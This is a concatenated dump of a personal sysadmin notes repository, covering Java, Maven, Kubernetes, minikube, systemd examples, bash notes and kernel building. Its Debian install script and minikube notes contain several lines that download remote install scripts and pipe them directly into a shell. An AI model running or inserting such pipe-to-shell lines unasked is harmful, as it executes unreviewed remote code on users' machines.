| 3 | import org.junit.jupiter.api.Test; 4 | import static org.junit.jupiter.api.Assertions.*; 5 | 6 | public class AppTest { 7 | 8 | @Test 9 | public void testAppStarts() { 10 | assertTrue(true); 11 | } 12 | } -------------------------------------------------------------------------------- /Java/Simple-http-server/README.md: -------------------------------------------------------------------------------- 1 | # Simple HTTP Java server 2 | This project can be used for Java-related server verification 3 | 4 | ## Prerequisites 5 | - \>= Java 17 6 | `sudo apt install openjdk-17-jdk -y` 7 | 8 | ## Steps to Use the Server 9 | 1. Compile code 10 | `javac SimpleHttpServer.java` 11 | 12 | 2. Run the server 13 | `java SimpleHttpServer` 14 | 15 | 3. Open a browser and go to: 16 | `http://localhost:8080` -------------------------------------------------------------------------------- /Java/Simple-http-server/SimpleHttpServer.java: -------------------------------------------------------------------------------- 1 | import com.sun.net.httpserver.HttpExchange; 2 | import com.sun.net.httpserver.HttpHandler; 3 | import com.sun.net.httpserver.HttpServer; 4 | 5 | import java.io.IOException; 6 | import java.io.OutputStream; 7 | import java.net.InetSocketAddress; 8 | import java.nio.file.Files; 9 | import java.nio.file.Path; 10 | 11 | public class SimpleHttpServer { 12 | public static void main(String[] args) throws IOException { 13 | int port = 8080; 14 | HttpServer server = HttpServer.create(new InetSocketAddress(port), 0); 15 | server.createContext("/", new FileHandler()); 16 | server.setExecutor(null); 17 | server.start(); 18 | System.out.println("Server started on port " + port); 19 | } 20 | 21 | static class FileHandler implements HttpHandler { 22 | @Override 23 | public void handle(HttpExchange exchange) throws IOException { 24 | Path filePath = Path.of("index.html"); 25 | if (!Files.exists(filePath)) { 26 | String response = "404 Not Found"; 27 |
exchange.sendResponseHeaders(404, response.getBytes().length); 28 | try (OutputStream os = exchange.getResponseBody()) { 29 | os.write(response.getBytes()); 30 | } 31 | return; 32 | } 33 | 34 | byte[] fileBytes = Files.readAllBytes(filePath); 35 | exchange.sendResponseHeaders(200, fileBytes.length); 36 | try (OutputStream os = exchange.getResponseBody()) { 37 | os.write(fileBytes); 38 | } 39 | } 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /Java/maven.md: -------------------------------------------------------------------------------- 1 | # Maven 2 | 3 | Build process 4 | ```mermaid 5 | graph LR 6 | 7 | source["**Source Code** 8 | Java"] 9 | 10 | compile["**Compile** 11 | javac"] 12 | 13 | test["**Tests** 14 | Unit/Integration"] 15 | 16 | package["**Packaging** 17 | jar, war, exe"] 18 | 19 | checks["**Checks** 20 | Code Analysis"] 21 | 22 | 23 | source --> compile 24 | compile --> test 25 | test --> package 26 | package --> checks 27 | ``` 28 | 29 | ## Creating a Project 30 | ```bash 31 | mvn archetype:generate -DgroupId=com.example.app -DartifactId=my-maven-app -DarchetypeArtifactId=maven-archetype-quickstart -DarchetypeVersion=1.5 -DinteractiveMode=false 32 | ``` 33 | 34 | ## [Maven Phases](https://maven.apache.org/guides/getting-started/maven-in-five-minutes.html) 35 | - validate 36 | - compile 37 | - test 38 | - package 39 | - integration-test 40 | - verify 41 | - install 42 | - deploy 43 | 44 | ## Useful Commands 45 | | Command | Description | 46 | | ------- | ------------| 47 | | `mvn compile` | Compile the Project | 48 | | `mvn package` | Package the project into a JAR | 49 | | `mvn exec:java` | Run the Project | 50 | | `mvn clean` | Clean the project (delete the target directory) | 51 | | `mvn clean package` | Run this every time you make changes to `pom.xml` | 52 | 53 | -------------------------------------------------------------------------------- /Kubernetes/configuration-files/hello-nginx.yml:
-------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 # API version for the Kubernetes Deployment object 2 | kind: Deployment # Specifies the type of Kubernetes object 3 | 4 | # Metadata contains identifying information about the deployment 5 | metadata: 6 | name: nginx-deployment # Name of the Deployment 7 | labels: 8 | app: nginx # Label to organize and select this resource 9 | 10 | # Specification for Deployment 11 | spec: 12 | replicas: 2 # Number of desired Pod replicas to run 13 | 14 | selector: # Selector defines how the Deployment finds which Pods to manage 15 | matchLabels: 16 | app: nginx # Select Pods with the label "app: nginx" 17 | 18 | # Template for the Pods that will be created by this Deployment 19 | template: 20 | metadata: 21 | labels: 22 | app: nginx # Assigns the "app: nginx" label to Pods 23 | 24 | # Specification for Pod 25 | spec: 26 | containers: 27 | - name: nginx # Name of the container inside the Pod 28 | image: nginx:1.21 # Docker image to use for this container (nginx version 1.21) 29 | ports: 30 | - containerPort: 80 # Port that the container exposes (typically HTTP) 31 | -------------------------------------------------------------------------------- /Kubernetes/minikube.md: -------------------------------------------------------------------------------- 1 | # Minikube 2 | 3 | ## Installation 4 | Minikube installation instructions can be found [here](https://minikube.sigs.k8s.io/docs/start/?arch=%2Flinux%2Fx86-64%2Fstable%2Fbinary+download) 5 | 6 | 7 | ### Debian system 8 | ```bash 9 | # Install Docker 10 | curl -fsSL get.docker.com -o get-docker.sh && sh get-docker.sh && rm get-docker.sh 11 | sudo groupadd docker 12 | sudo usermod -aG docker $USER 13 | newgrp docker 14 | 15 | # Install minikube 16 | curl -LO https://github.com/kubernetes/minikube/releases/latest/download/minikube-linux-amd64 17 | sudo install minikube-linux-amd64 /usr/local/bin/minikube && rm minikube-linux-amd64 18 | 19 | # Kubectl
20 | curl -LO "https://dl.k8s.io/release/$(curl -sL https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" 21 | sudo install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl && rm kubectl 22 | ``` 23 | 24 | ## Start cluster 25 | ```bash 26 | minikube start 27 | ``` 28 | 29 | ## Configuration 30 | The configuration is available in the `~/.kube/config` 31 | 32 | ## Cleanup 33 | ```bash 34 | minikube stop 35 | minikube delete 36 | ``` -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2024 Spyridakis Christos 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /Linux/Debian/apps-install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # A simple script to easily install some of my go-to apps in a debian based system 4 | 5 | sudo apt update -y 6 | 7 | sudo apt install -y \ 8 | git vim nemo samba pdfarranger \ 9 | meld evince xournal gscan2pdf \ 10 | texlive texlive-full \ 11 | vlc filezilla speedtest-cli \ 12 | kdeconnect indicator-multiload \ 13 | wireshark aircrack-ng nmap zenmap \ 14 | john macchanger steghide cmatrix \ 15 | traceroute whois xbindkeys xautomation \ 16 | solaar network-manager \ 17 | btop htop gparted gdu fzf \ 18 | software-properties-common dconf-editor expect hardinfo openvpn caffeine psensor gnome-system-monitor gnome-tweaks clamav clamtk tmux tree figlet ranger ncdu calcurse xclip neofetch iperf3 bmon iftop nload ptunnel tcpdump chromium-browser 19 | 20 | 21 | # Communication 22 | sudo snap install skype 23 | sudo snap install telegram-desktop 24 | sudo snap install caprine # Facebook messenger 25 | # Slack 26 | 27 | #ZSH fonts 28 | git clone https://github.com/powerline/fonts.git --depth=1 29 | cd fonts 30 | ./install.sh 31 | 32 | # Ollama 33 | curl -fsSL https://ollama.com/install.sh | sh 34 | 35 | # Rust 36 | curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh 37 | 38 | # Docker 39 | bash <(curl -sL https://gist.githubusercontent.com/CSpyridakis/0dd4e045dcddc68496c8403c098e0c19/raw/0fda1a194f559b05d6e26311c54090abe0cba4ca/install-docker.sh) 40 | 41 | # Lazygit 42 | LAZYGIT_VERSION=$(curl -s "https://api.github.com/repos/jesseduffield/lazygit/releases/latest" | \grep -Po '"tag_name": *"v\K[^"]*') 43 | curl -Lo lazygit.tar.gz "https://github.com/jesseduffield/lazygit/releases/download/v${LAZYGIT_VERSION}/lazygit_${LAZYGIT_VERSION}_Linux_x86_64.tar.gz" 44 | tar xf lazygit.tar.gz lazygit 45 | sudo install lazygit -D -t /usr/local/bin/ 46 | 47 | 
# Lazydocker 48 | curl https://raw.githubusercontent.com/jesseduffield/lazydocker/master/scripts/install_update_linux.sh | bash 49 | -------------------------------------------------------------------------------- /Linux/Kernel/README.md: -------------------------------------------------------------------------------- 1 | # Kernel 2 | 3 | The Linux kernel is the core component of a Linux OS. 4 | 5 | It manages hardware resources, processes, memory, device drivers, file systems, and networking. 6 | 7 | --- 8 | 9 | ## Types of Kernels 10 | 11 | **Monolithic**: Linux is monolithic, i.e. everything (drivers, filesystem, networking) runs in kernel space. 12 | 13 | **Modular**: Linux supports loadable kernel modules (LKMs) that can be inserted/removed at runtime (e.g. modprobe, insmod). 14 | 15 | --- 16 | 17 | ## Kernel Versioning 18 | 19 | Format: `major`**.**`minor`**.**`patch` (e.g., 6.1.15) 20 | - Even minor numbers used to mean "stable"; this is no longer the case. 21 | 22 | LTS (Long Term Support) kernels are maintained for years (e.g., 5.10, 6.1). 23 | 24 | Get version: `uname -r` 25 | 26 | --- 27 | 28 | ## Modules 29 | List kernel modules 30 | ``` 31 | sudo lsmod 32 | ``` 33 | 34 | ```mermaid 35 | graph BT 36 | 37 | 38 | HARDWARE <--> hmanage 39 | 40 | subgraph KERNEL["Kernel space"] 41 | direction BT 42 | hmanage["Hardware management"] <--> syscalls["System calls"] 43 | end 44 | 45 | syscalls <--> libs 46 | subgraph USER["User space"] 47 | direction BT 48 | libs["Standard Libraries"] <--> applications["Etc.. 
(Applications)"] 49 | end 50 | ``` 51 | 52 | --- 53 | ## Important Directories & Files 54 | 55 | | **Path** | **Purpose** | 56 | |----------------------------------|--------------------------------------------| 57 | | `/proc` | Virtual filesystem for kernel info | 58 | | `/sys` | Kernel exposes hardware & device info | 59 | | `/boot` | Stores kernel images and initramfs | 60 | | `/lib/modules/$(uname -r)` | Kernel modules for the current kernel | 61 | 62 | --- 63 | 64 | ## Common Commands 65 | | **Task** | **Command** | 66 | |------------------------------|----------------------------------------------| 67 | | View kernel version | `uname -r` | 68 | | List loaded modules | `lsmod` | 69 | | Load a module | `modprobe <module>` | 70 | | Unload a module | `modprobe -r <module>` or `rmmod <module>` | 71 | | Show kernel log (ring buffer)| `dmesg` | 72 | -------------------------------------------------------------------------------- /Linux/RPM/CentOS/README.md: -------------------------------------------------------------------------------- 1 | # CentOS 2 | 3 | Initial configuration 4 | ``` 5 | sudo dnf install epel-release 6 | ``` 7 | 8 | The epel-release package on CentOS enables the Extra Packages for Enterprise Linux (EPEL) repository -------------------------------------------------------------------------------- /Linux/RPM/httpd/demo-http-server-simple.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Update system 4 | yum update -y 5 | 6 | # Install HTTP server 7 | yum install -y httpd 8 | systemctl enable httpd 9 | systemctl start httpd 10 | 11 | # Add a dummy page 12 | echo "

If you are here, congrats! There is a working HTTP server on your machine.

" \ 13 | > /var/www/html/index.html 14 | 15 | 16 | -------------------------------------------------------------------------------- /Linux/Systemd/examples/ddns-update/INSTALL: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | set -e 4 | 5 | # Paths 6 | SCRIPT_SRC_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" 7 | SCRIPT_DST="/usr/local/bin/update_ddns.sh" 8 | SERVICE_DST="/etc/systemd/system/update_ddns.service" 9 | TIMER_DST="/etc/systemd/system/update_ddns.timer" 10 | 11 | echo "Installing update_ddns.sh..." 12 | sudo install -m 755 "$SCRIPT_SRC_DIR/update_ddns.sh" "$SCRIPT_DST" 13 | 14 | echo "Installing systemd service and timer..." 15 | sudo install -m 644 "$SCRIPT_SRC_DIR/update_ddns.service" "$SERVICE_DST" 16 | sudo install -m 644 "$SCRIPT_SRC_DIR/update_ddns.timer" "$TIMER_DST" 17 | 18 | echo "Reloading systemd..." 19 | sudo systemctl daemon-reload 20 | 21 | echo "Enabling and starting the timer..." 22 | sudo systemctl enable --now update_ddns.timer 23 | 24 | echo "Installation complete!" 
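A quick post-install sanity check can read the schedule back out of the timer unit. The snippet below is a sketch: on a live system you would point `TIMER_FILE` at `/etc/systemd/system/update_ddns.timer` (or simply run `systemctl list-timers update_ddns.timer`); here it builds a scratch copy of the timer so it is runnable anywhere.

```shell
#!/bin/bash
# Write a scratch copy of the timer unit (illustrative; on a real
# system use /etc/systemd/system/update_ddns.timer instead).
TIMER_FILE="$(mktemp)"
printf '[Unit]\nDescription=Run update_ddns.service every hour\n\n[Timer]\nOnCalendar=hourly\nPersistent=true\n' > "$TIMER_FILE"

# Extract the OnCalendar= schedule from the unit file
schedule="$(grep -E '^OnCalendar=' "$TIMER_FILE" | cut -d= -f2)"
echo "Timer schedule: $schedule"

rm -f "$TIMER_FILE"
```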
-------------------------------------------------------------------------------- /Linux/Systemd/examples/ddns-update/update_ddns.service: -------------------------------------------------------------------------------- 1 | # /etc/systemd/system/update_ddns.service 2 | [Unit] 3 | Description=Update DDNS and log IP 4 | 5 | [Service] 6 | Type=oneshot 7 | ExecStart=/usr/local/bin/update_ddns.sh 8 | -------------------------------------------------------------------------------- /Linux/Systemd/examples/ddns-update/update_ddns.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # ---------------------------------------------- 4 | # Log IP 5 | # ---------------------------------------------- 6 | 7 | # Define log file 8 | LOG_DIR="/log" 9 | LOG_FILE="$LOG_DIR/ip_logs.txt" 10 | 11 | # Create log directory if it doesn't exist 12 | mkdir -p "$LOG_DIR" 13 | 14 | # Get public IP 15 | PUBLIC_IP=$(curl -s https://api.ipify.org) 16 | 17 | # Get current timestamp 18 | TIMESTAMP=$(date "+%Y-%m-%d %H:%M:%S") 19 | 20 | # Log the timestamp and IP 21 | echo "$TIMESTAMP - $PUBLIC_IP" >> "$LOG_FILE" 22 | 23 | # ---------------------------------------------- 24 | # Update DDNS 25 | # ---------------------------------------------- 26 | # FIXME: This is specific to each DDNS used -------------------------------------------------------------------------------- /Linux/Systemd/examples/ddns-update/update_ddns.timer: -------------------------------------------------------------------------------- 1 | # /etc/systemd/system/update_ddns.timer 2 | [Unit] 3 | Description=Run update_ddns.service every hour 4 | 5 | [Timer] 6 | OnCalendar=hourly 7 | Persistent=true 8 | 9 | [Install] 10 | WantedBy=timers.target 11 | -------------------------------------------------------------------------------- /Linux/Systemd/my-dummy-service.service: -------------------------------------------------------------------------------- 1 | [Unit] 2 | Description=My Dummy
Service 3 | 4 | [Service] 5 | Type=oneshot 6 | 7 | # Set environment variables 8 | Environment="MY_DUMMY_SERVICE=dummy-service-env-var" 9 | 10 | ExecStart=/usr/bin/date +"%%d-%%m-%%Y %%T" 11 | ExecStart=/usr/bin/echo "My dummy service ENV VAR: ${MY_DUMMY_SERVICE}" 12 | 13 | PrivateTmp=true 14 | 15 | Restart=no 16 | 17 | StandardError=journal 18 | StandardOutput=journal 19 | # Or 20 | # StandardOutput=append:/tmp/my-dummy-service.log 21 | 22 | [Install] 23 | WantedBy=multi-user.target -------------------------------------------------------------------------------- /Linux/Systemd/service.md: -------------------------------------------------------------------------------- 1 | # Systemd Service 2 | 3 | A **service** in systemd is a type of unit file that tells the system how to **start**, **stop**, **reload**, and manage a background **service** or **process**, e.g. a web server, database, or custom script. 4 | 5 | --- 6 | 7 | ## Service file 8 | Service file example. An enhanced [.service](./service-template.service) example is located here. 9 | ``` 10 | [Unit] 11 | # Contains a more general configuration for the unit 12 | 13 | Description=Some description 14 | Documentation=Link or man page 15 | 16 | 17 | [Service] 18 | # Defines how the service should behave, like the start/stop/reload commands to execute 19 | 20 | Type=simple 21 | ExecStart=<command> 22 | 23 | [Install] 24 | # Install ~= enable/disable 25 | # Defines in which target the service is placed when it is enabled 26 | WantedBy=<target>.target 27 | ``` 28 | 29 | -------------------------------------------------------------------------------- /Linux/Systemd/target.md: -------------------------------------------------------------------------------- 1 | # Systemd targets 2 | 3 | In systemd, a target is a special kind of unit that groups other units together to manage the system's state, like booting into graphical mode, multi-user mode, rescue mode, etc.
4 | 5 | --- 6 | 7 | ## Common targets: 8 | 9 | | Target | Description | 10 | | ----- | ------------- | 11 | | `graphical.target` | Multi-user system with GUI 12 | | `multi-user.target` | Multi-user system without GUI 13 | | `rescue.target` | Minimal system for maintenance (single-user mode) 14 | | `emergency.target` | Bare minimum system with no services except systemd and a shell 15 | | `default.target` | The default target used at boot (symlink to one of the above) 16 | 17 | --- 18 | 19 | ## Common commands: 20 | 21 | - Check your current target: `sudo systemctl get-default` 22 | - List available targets: `sudo systemctl list-units --type target --all` 23 | - Switch current target: `sudo systemctl isolate <target>.target` 24 | - Change default target: `sudo systemctl set-default <target>.target` 25 | - See which services are tied to a target: `sudo systemctl list-dependencies <target>.target` 26 | 27 | --- 28 | 29 | ## How it works 30 | Assume the following `.service` file 31 | ``` 32 | ... 33 | [Install] 34 | WantedBy=<target>.target 35 | ``` 36 | 37 | The idea is that at the point we execute: `sudo systemctl enable <service>` 38 | 39 | A **symlink** will be created in `/etc/systemd/system/<target>.target.wants/<service>.service`. 40 | 41 | Hence, all services that need to be started at a given target are located in the same place.
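As a rough illustration of this mechanism, the sketch below simulates the `.wants` symlink that `systemctl enable` would create, using a scratch directory in place of `/etc/systemd/system` so it needs no root privileges or live systemd (the unit name is borrowed from the dummy service in this repo):

```shell
# /tmp/target-demo stands in for /etc/systemd/system
DEMO=/tmp/target-demo
mkdir -p "$DEMO/multi-user.target.wants"
touch "$DEMO/my-dummy-service.service"

# This symlink is what `systemctl enable` would create for a unit
# whose [Install] section says WantedBy=multi-user.target
ln -sf "$DEMO/my-dummy-service.service" \
       "$DEMO/multi-user.target.wants/my-dummy-service.service"

ls -l "$DEMO/multi-user.target.wants/"
```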
-------------------------------------------------------------------------------- /Linux/Ubuntu/workspaces.md: -------------------------------------------------------------------------------- 1 | 2 | ## Workspace Grid 3 | 4 | ### Set Workspace grid 5 | ``` 6 | # Install dconf 7 | sudo apt install dconf-editor 8 | 9 | # Set the grid size 10 | WNUM="3" 11 | 12 | # Number of vertical workspaces 13 | dconf write /org/compiz/profiles/unity-lowgfx/plugins/core/vsize ${WNUM} 14 | 15 | # Number of horizontal workspaces 16 | dconf write /org/compiz/profiles/unity-lowgfx/plugins/core/hsize ${WNUM} 17 | ``` 18 | 19 | ### Verify 20 | ``` 21 | dconf read /org/compiz/profiles/unity-lowgfx/plugins/core/vsize 22 | dconf read /org/compiz/profiles/unity-lowgfx/plugins/core/hsize 23 | ``` -------------------------------------------------------------------------------- /Linux/awesome-cli-tools.md: -------------------------------------------------------------------------------- 1 | # Awesome tools 2 | 3 | | Tool | Description | 4 | | --------- | ------------- | 5 | | `links` | CLI 'browser' | -------------------------------------------------------------------------------- /Linux/bash/brackets.md: -------------------------------------------------------------------------------- 1 | # Brackets 2 | 3 | For more details regarding conditions read [this](./conditions.md). 4 | 5 | | **Construct** | **Description** | **When to Use** | 6 | |---------------|----------------------------------------------|-----------------------------------------------------------------------------| 7 | | `( )` | Subshell: commands run in a separate process | When you want to isolate temporary changes, like directory changes or variables, without affecting the parent shell. | 8 | | `{ }` | Grouping in the current shell | When you need to group multiple commands that share variables or environment changes in the current shell.
| 9 | | `[]` | Basic test | For simple conditional checks (POSIX-compliant), such as file existence or string/numeric comparisons. | 10 | | `[[ ]]` | Advanced test | For more complex Bash-specific conditions, including logical operators (`&&`, `\|\|`) or regex matching. | 11 | | `(( ))` | Arithmetic evaluation | When performing numeric operations or comparisons directly within a script. | 12 | -------------------------------------------------------------------------------- /Linux/bash/conditions.md: -------------------------------------------------------------------------------- 1 | # Conditions 2 | 3 | ## "No brackets" 4 | Relying on Command Exit Codes 5 | 6 | E.g. 7 | ``` bash 8 | if grep -q "pattern" file.txt; then 9 | echo "Pattern found" 10 | fi 11 | ``` 12 | 13 | Avoid "no brackets" approaches unless your use case is simple or implicit logic suffices. 14 | 15 | ## Single Brackets [] 16 | Used for simple conditional checks, such as string comparisons, file checks, or numeric comparisons. 17 | 18 | **Caution:** 19 | Requires spaces between the brackets and the expression. 20 | 21 | E.g. 22 | ``` bash 23 | # String comparison 24 | if [ "$var" = "value" ]; then 25 | echo "Match" 26 | fi 27 | 28 | # File existence 29 | if [ -f "file.txt" ]; then 30 | echo "File exists" 31 | fi 32 | 33 | # Numeric comparison 34 | if [ "$num" -eq 10 ]; then 35 | echo "Number is 10" 36 | fi 37 | ``` 38 | 39 | Limitations: 40 | 41 | * Cannot handle complex logical expressions (e.g., && or ||) without combining multiple conditions. 42 | 43 | * Doesn't support regex matching. 44 | 45 | --- 46 | 47 | ## Double Brackets [[]] 48 | Enhanced test command with more features and improved syntax. 49 | 50 | **Caution:** 51 | Specific to Bash (not POSIX-compliant). Supports additional operators like &&, ||, and regex matching. Quoting variables is less strict (no errors for empty variables). 52 | 53 | E.g. 
54 | ``` bash 55 | # Logical operators 56 | if [[ "$var" = "value" && "$num" -gt 5 ]]; then 57 | echo "Conditions met" 58 | fi 59 | 60 | # Regex matching 61 | if [[ "$var" =~ ^[A-Za-z]+$ ]]; then 62 | echo "Variable contains only letters" 63 | fi 64 | ``` 65 | 66 | Advantages: 67 | 68 | * Easier syntax for logical operators and regex. 69 | 70 | * Safer and more readable compared to [ ]. 71 | 72 | 73 | ## Double Parentheses (( )) 74 | Used for arithmetic evaluation. 75 | 76 | **Caution:** 77 | Supports C-like arithmetic operations (+, -, *, /, ++, --). 78 | Return status indicates whether the result is non-zero (useful in conditions). 79 | 80 | E.g. 81 | ``` bash 82 | # Arithmetic comparison 83 | if (( num > 10 )); then 84 | echo "Number is greater than 10" 85 | fi 86 | 87 | # Arithmetic operations 88 | (( count++ )) 89 | (( sum = num1 + num2 )) 90 | 91 | ``` 92 | 93 | Advantages: 94 | 95 | * Cleaner syntax for arithmetic operations and comparisons. 96 | 97 | * No need to use -eq, -gt, etc., for numeric comparisons. 98 | -------------------------------------------------------------------------------- /Linux/bash/program-variables.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo "Start:" 4 | sleep 2 5 | 6 | echo "> CMD: [\$0] - Name of the script - Output: [$0]" 7 | echo "> CMD: [\$1-\$9] - Bash script input arguments - Output: ['$1', '$2', ...]" 8 | echo "> CMD: [\$#] - Number of arguments - Output: [$#]" 9 | echo "> CMD: [\$@] - Input arguments - Output: [$@]" 10 | echo "> CMD: [\$?] 
- Exit status of previous command - Output: [$?]" 11 | echo "> CMD: [\$$] - The script process ID - Output: [$$]" 12 | echo "> CMD: [\$USER] - User executing script - Output: [$USER]" 13 | echo "> CMD: [\$HOSTNAME] - Machine hostname - Output: [$HOSTNAME]" 14 | echo "> CMD: [\$SECONDS] - Seconds passed since script started - Output: [$SECONDS]" 15 | echo "> CMD: [\$RANDOM] - A random number - Output: [$RANDOM]" 16 | echo "> CMD: [\$LINENO] - Current line number - Output: [$LINENO]" 17 | 18 | -------------------------------------------------------------------------------- /Linux/bash/uuid.md: -------------------------------------------------------------------------------- 1 | # Universally Unique Identifier (UUID) 2 | A 128-bit number (commonly written as 32 hexadecimal digits) used to uniquely identify objects or entities in computer systems. 3 | 4 | * Standard Format: 5 | `xxxxxxxx-xxxx-Mxxx-Nxxx-xxxxxxxxxxxx` 6 | 7 | M: The version of the UUID (e.g., version 1, 4). 8 | N: Indicates variant and type (e.g., standard or reserved). 9 | 10 | | **Version** | **Name** | **Generation Mechanism** | **Use Case** | 11 | |-------------|-------------------|------------------------------------------------------------|------------------------------------------------------| 12 | | 1 | Timestamp-based | Combines current timestamp with the MAC address of the machine. | Useful when time-ordering is required. | 13 | | 2 | DCE Security | Similar to version 1 but includes POSIX UIDs (User IDs) and other fields. | Less commonly used, mainly for legacy systems. | 14 | | 3 | Name-based (MD5) | Uses an MD5 hash of a namespace and a name. Deterministic. | Useful for generating consistent IDs from inputs. | 15 | | 4 | Random | Generated entirely randomly. | Most common version due to simplicity and randomness.| 16 | | 5 | Name-based (SHA-1)| Uses a SHA-1 hash of a namespace and a name. Deterministic. | Similar to version 3 but more secure.
| 17 | 18 | 19 | * Generate in Linux: 20 | Random-Based UUIDs: `uuidgen -r` 21 | Time-Based UUIDs: `uuidgen -t` 22 | Hash-Based UUIDs (MD5): `uuidgen -m -N <name> -n @url` 23 | Hash-Based UUIDs (SHA1): `uuidgen -s -N <name> -n @url` 24 | Using kernel: `cat /proc/sys/kernel/random/uuid` -------------------------------------------------------------------------------- /Linux/bash/variables.md: -------------------------------------------------------------------------------- 1 | # Bash Variables and Their Outputs 2 | 3 | | **Variable** | **Description** | **Output Example** | 4 | |-----------------|----------------------------------------------------|-------------------------------------| 5 | | `$0` | Name of the script | `script.sh` | 6 | | `$1, $2, ...` | Positional parameters (arguments to the script) | `arg1`, `arg2`, etc. | 7 | | `$#` | Number of arguments passed to the script | `2` (if two arguments are passed) | 8 | | `$@` | All arguments passed to the script | `arg1 arg2` | 9 | | `$?` | Exit status of the last executed command | `0` (success) or `non-zero` (failure) | 10 | | `$$` | Process ID (PID) of the script | `12345` | 11 | | `$USER` | Username of the user executing the script | `john` | 12 | | `$HOSTNAME` | Hostname of the machine | `my-computer` | 13 | | `$SECONDS` | Number of seconds since the script started | `45` | 14 | | `$RANDOM` | A random number | `28657` | 15 | | `$LINENO` | Current line number in the script | `15` | 16 | 17 | Example: 18 | ``` 19 | echo "> CMD: [\$0] - Name of the script - Output: [$0]" 20 | echo "> CMD: [\$1-\$9] - Bash script input arguments - Output: ['$1', '$2', ...]" 21 | echo "> CMD: [\$#] - Number of arguments - Output: [$#]" 22 | echo "> CMD: [\$@] - Input arguments - Output: [$@]" 23 | echo "> CMD: [\$?] 
- Exit status of previous command - Output: [$?]" 24 | echo "> CMD: [\$$] - The script process ID - Output: [$$]" 25 | echo "> CMD: [\$USER] - User executing script - Output: [$USER]" 26 | echo "> CMD: [\$HOSTNAME] - Machine hostname - Output: [$HOSTNAME]" 27 | echo "> CMD: [\$SECONDS] - Seconds passed since script started - Output: [$SECONDS]" 28 | echo "> CMD: [\$RANDOM] - A random number - Output: [$RANDOM]" 29 | echo "> CMD: [\$LINENO] - Current line number - Output: [$LINENO]" 30 | ``` -------------------------------------------------------------------------------- /Linux/bootloader.md: -------------------------------------------------------------------------------- 1 | # Bootloader 2 | 3 | The bootloader's goal is to load the kernel into memory and then pass control to the OS. 4 | 5 | **GRUB2** is one of the most well-known bootloaders. 6 | 7 | ```mermaid 8 | flowchart LR 9 | 10 | bios["BIOS/UEFI"] --> grub["Bootloader"] --> kernel["Kernel"] 11 | ``` 12 | 13 | GRUB2 configuration location: `/etc/default/grub` 14 | 15 | Update configuration 16 | 17 | Debian based: 18 | ```bash 19 | sudo update-grub 20 | ``` 21 | 22 | Red Hat based 23 | ```bash 24 | sudo grub2-mkconfig -o /boot/grub2/grub.cfg 25 | ``` 26 | 27 | These regenerate the generated config: `/boot/grub/grub.cfg` on Debian, `/boot/grub2/grub.cfg` on Red Hat 28 | 29 | > [!IMPORTANT] 30 | > **NEVER** manually edit the generated `/boot/grub/grub.cfg` -------------------------------------------------------------------------------- /Linux/bu/snapshots.md: -------------------------------------------------------------------------------- 1 | # Snapshots 2 | 3 | ## Timeshift 4 | 5 | **Common Commands** 6 | ```bash 7 | # Show Available Snapshots 8 | sudo timeshift --list 9 | 10 | # Check available devices 11 | sudo timeshift --list-devices 12 | 13 | # Create a New Snapshot 14 | # --tags: D (daily), W (weekly), M (monthly), B (boot), O (on-demand) 15 | sudo timeshift --create --comments "Manual backup" --tags D 16 | 17 | # Restore a Snapshot 18 | sudo timeshift --restore 19 | 20 | # Delete a 
Snapshot 21 | sudo timeshift --delete --snapshot '<snapshot_name>' 22 | ``` -------------------------------------------------------------------------------- /Linux/build-and-install-kernel.md: -------------------------------------------------------------------------------- 1 | # Build and install a different Linux kernel 2 | 3 | Instructions based on this [guide](https://phoenixnap.com/kb/build-linux-kernel) 4 | 5 | ## 1. Download Linux kernel source code (kernel.org) 6 | ``` 7 | LINUX_KERNEL_INST_VERSION="6.10.9" 8 | wget https://cdn.kernel.org/pub/linux/kernel/v6.x/linux-${LINUX_KERNEL_INST_VERSION}.tar.xz 9 | ``` 10 | 11 | ## 2. Extract the source code 12 | ``` 13 | tar xvf linux-${LINUX_KERNEL_INST_VERSION}.tar.xz 14 | ``` 15 | 16 | ## 3. Install additional packages 17 | ``` 18 | sudo apt-get install git fakeroot build-essential ncurses-dev xz-utils libssl-dev bc flex libelf-dev bison 19 | ``` 20 | 21 | ## 4. Configure Kernel 22 | ``` 23 | cd linux-${LINUX_KERNEL_INST_VERSION} 24 | cp /boot/config-$(uname -r) .config 25 | make menuconfig 26 | # Make any needed changes regarding modules 27 | ``` 28 | 29 | ## 5. Disable conflicting security certificates on Ubuntu 30 | ``` 31 | scripts/config --disable SYSTEM_TRUSTED_KEYS 32 | scripts/config --disable SYSTEM_REVOCATION_KEYS 33 | ``` 34 | 35 | ## 6. Build the kernel (This will take some time) 36 | ``` 37 | make -j $(nproc) 38 | ``` 39 | 40 | ## 7. Install the required modules 41 | ``` 42 | sudo make modules_install 